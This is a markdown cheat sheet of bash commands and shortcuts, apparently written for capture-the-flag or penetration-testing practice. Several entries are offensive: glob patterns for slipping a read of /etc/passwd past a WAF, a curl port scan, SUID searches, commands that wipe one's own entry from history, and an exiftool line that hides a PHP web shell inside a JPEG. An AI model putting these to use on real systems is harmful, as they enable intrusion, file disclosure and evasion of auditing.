Skip to content

Latest commit

 

History

History
132 lines (116 loc) · 3.52 KB

bash.md

File metadata and controls

132 lines (116 loc) · 3.52 KB
Raw

Bash

Uname

uname -n # network node hostname
uname -r # kernel release
uname -v # kernel version
uname -p # processor type
uname -o # operating system
uname -m # machine hardware name

Ctrl keys

Ctrl + l : Clear
Ctrl + p : Move up
Ctrl + n : Move down
Ctrl + r : Command history search
Ctrl + w : Cut the word before the cursor 
Ctrl + u : Cut the line before the cursor
Ctrl + y : Paste
Ctrl + a : Move cursor to the start of the line
Ctrl + e : Move cursor to the end of the line
Ctrl + k : Delete all text after the cursor
Ctrl + s : to stop output to terminal.
Ctrl + q : to resume output to terminal after Ctrl + s.
Ctrl + d : if you've type something, Ctrl + d deletes the character under the cursor, else, it escapes the current shell.
Ctrl + x + backspace : delete all text from the beginning of line to the cursor.
Ctrl + t : transpose the character before the cursor with the one under the cursor, press Esc + t to transposes the two words before the cursor.
Ctrl + _ : undo typing.
Ctrl + x + Ctrl + e : launch editor defined by $EDITOR to input your command. Useful for multi-line commands.

Esc keys

Esc + u: converts text after the cursor to uppercase
Esc + l: converts text after cursor lowercase
Esc + c: converts letter under the cursor to uppercase

Globbing

# '*' serves as a "wild card" for filename expansion.
/etc/pa*wd    #/etc/passwd

# '?' serves as a single-character "wild card" for filename expansion.
/b?n/?at      #/bin/cat

# ‘[]’ serves to match the character from a range.
ls -l [a-z]*   #list all files with alphabet in its filename.

# ‘{}’ can be used to match filenames with more than one patterns
ls {*.sh,*.py}   #list all .sh and .py files

Bypass /etc/passwd WAF

/e?c/?asswd
/e*c/*asswd
/??c/?asswd
/??c/?assw?

Environment variables

$0   :name of shell or shell script.
$1, $2, $3, ... :positional parameters.
$#   :number of positional parameters.
$?   :most recent foreground pipeline exit status.
$-   :current options set for the shell.
$$   :pid of the current shell (not subshell).
$!   :is the PID of the most recent background command.

$DESKTOP_SESSION     current display manager
$EDITOR   preferred text editor.
$LANG   current language.
$PATH   list of directories to search for executable files (i.e. ready-to-run programs)
$PWD    current directory
$SHELL  current shell
$USER   current username
$HOSTNAME   current hostname

Read file contents

cat *
cat file.txt
more file.txt
head file.txt
tail file.txt
echo < file.txt
grep . file.txt
while read line; do echo $line; done < file.txt

Bash port scanner

John Hammond

curl http://10.10.10.1:[30000-60000]

Find SUID files

find "$DIRECTORY" -perm /4000     # SUID
find "$DIRECTORY" -perm /u=s      # SUID
find "$DIRECTORY" -perm /2000     # SGID
find "$DIRECTORY" -perm /g=s      # SGID
find "$DIRECTORY" -perm /6000     # SGID + SUID
find "$DIRECTORY" -perm /u=s,g=s  # SGID + SUID

Execute command without keeping it in history

<your_secret_command>; history -d $((HISTCMD-1))
<your_secret_command>; history -d $(history 1)

Processes

ps              # list all processes
ps aux          # list all processes (detailed)
kill PID        # kill by ID
kill PROCESS    # kill by process name
kill -9 PID     # hard kill by process ID
lsof -i:PORT    # list process running on specified port

Hide code inside an image

exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' shell.jpg
cp shell.jpg shell.php.jpg